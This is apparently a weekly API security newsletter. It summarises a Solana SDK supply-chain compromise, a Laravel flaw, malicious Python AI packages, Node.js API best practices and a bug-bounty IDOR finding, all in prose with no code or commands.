This week, we focus on raising awareness about API vulnerabilities created by direct attacks against API development teams and tech stacks. We also share articles on safe use of API frameworks, and examine how OWASP API vulnerabilities are uncovered by bounty hunters.
Article: How secure is your API SDLC?
API teams can produce secure and reliable APIs through rigorous design, coding and testing. However, this recent article highlights how every phase of API development is now at risk, forcing API teams to take a broader view of API security beyond just the code they produce.
Some common sources of SDLC vulnerabilities mentioned include:
- granting excessive access rights to outsourced development teams
- poorly configured CI/CD pipelines
- OAuth phishing
- mismanaged development teams with lax security practices
This means that API security requires a broader perspective and must encompass not only core secure development practices, but also rigorous cybersecurity awareness across the API team and organization.
Vulnerability: Malicious API injected in Solana Javascript SDK
The Solana JavaScript SDK, a widely used package on NPM with over 350,000 weekly downloads, enables developers to interact with the Solana blockchain via API requests.
A hacker reportedly injected malicious code into the SDK, turning it into a tool for stealing private keys in a classic supply-chain attack. The compromised code allowed the hacker to extract private keys from any application built using the infected SDK and send them to an API endpoint under the hacker’s control. Possession of a user’s private keys allows a hacker to drain their digital wallets.
The report suggests that the attacker may have compromised the SDK’s developers through social engineering or phishing tactics, to gain unauthorized access to the package. If true, it demonstrates why API security training should extend from secure coding practices to include general practices for good cyber hygiene.
Vulnerability: Laravel security flaws expose API developers
Staying on the topic of SDLC vulnerabilities, a recently discovered critical vulnerability could compromise the security of APIs developed with the Laravel framework.
Laravel is a popular web application framework and is also used for API backend development.
The bug manifested itself at the request handling stage and allowed an attacker to gain unauthorized access by using malicious user input passed in a request as URL query strings.
This is a reminder that the frameworks that API developers choose to use in their projects can inadvertently introduce security vulnerabilities into APIs and applications. It highlights the importance of carefully choosing and configuring frameworks and libraries, many of which are not secure by default, and the need for extensive API security testing to identify issues early on.
Teams are also advised to monitor advisory updates for all dependencies used in API development for prompt notification of new security issues and critical updates.
Vulnerability: Python AI packages disguise malicious API
From PHP to Python, another gotcha for API developers to watch out for is the use of malicious third-party packages.
A report on the Dark Reading website describes how developers, keen to jump on the AI bandwagon, can be duped into installing malicious packages with hidden malware.
In this incident developers were offered a quick and free way to add AI functionality into their projects by installing a Python package. The package claimed to provide API access to GenAI platforms, but behind the scenes the package also injects the developer’s project with malware. Notably, the package appeared to function as expected, making it easier for developers to miss the danger during testing.
“They committed the extra effort to make it look legitimate”
Leveraging open-source software can significantly reduce development time and effort, but it also comes with inherent risks when the security of the code is essentially unknown. To mitigate these risks, development teams should adopt a zero-trust approach to open-source dependencies. This involves thoroughly reviewing, auditing, and testing any package before integration to ensure it meets security standards.
Article: Node APIs done right
Moving from vulnerabilities to best practices, the “9 Principles for Doing Node.js Right in Enterprise Environments” guide shares essential tips and recommendations for building secure and reliable APIs using the popular Node.js framework.
It includes recommendations by industry experts to focus on defensive testing, including negative testing and security testing. It also devotes a section to error handling, a common source of API vulnerabilities and a major topic of our previous issue of this newsletter.
The guide also describes the benefits of using API specifications in a multi-team environment.
“By defining your API’s structure, data types, and operations, you can ensure that different teams can work independently while maintaining compatibility and avoiding misunderstandings”.
Similarly, API specifications help to clearly define and share the security requirements of an API, a practice we have been advocating for a long time in this newsletter.
This guide contains a lot of very useful information. Recommended reading!
Vulnerability: How a bug bounty hunt reveals API IDOR flaws
The methods used by penetration testers and hackers can provide valuable insights to an API team on how to eliminate the risk from common API attacks.
This report from a bug bounty hunter shows how an attacker can probe and test your API for an exploitable vulnerability. In this case, the bounty hunter focused on manipulating the API user input to attempt to invoke unexpected behavior or response from the target API, a common tactic used by hackers.
By changing a user_id parameter in the API request, the bounty hunter discovered that the API would return a resource that did not belong to the authenticated user. This revealed that the API has a well known authorization vulnerability called Insecure Direct Object Reference (IDOR).
The relative simplicity of the test to uncover this severe API authorization flaw demonstrates why IDOR, also known as Broken Object Level Authorization (BOLA), is the top risk in the 2023 OWASP API Security Top 10 list.
Steps to prevent successful BOLA attacks against your APIs are shared here.
Get API Security news directly in your Inbox.
By clicking Subscribe you agree to our Data Policy
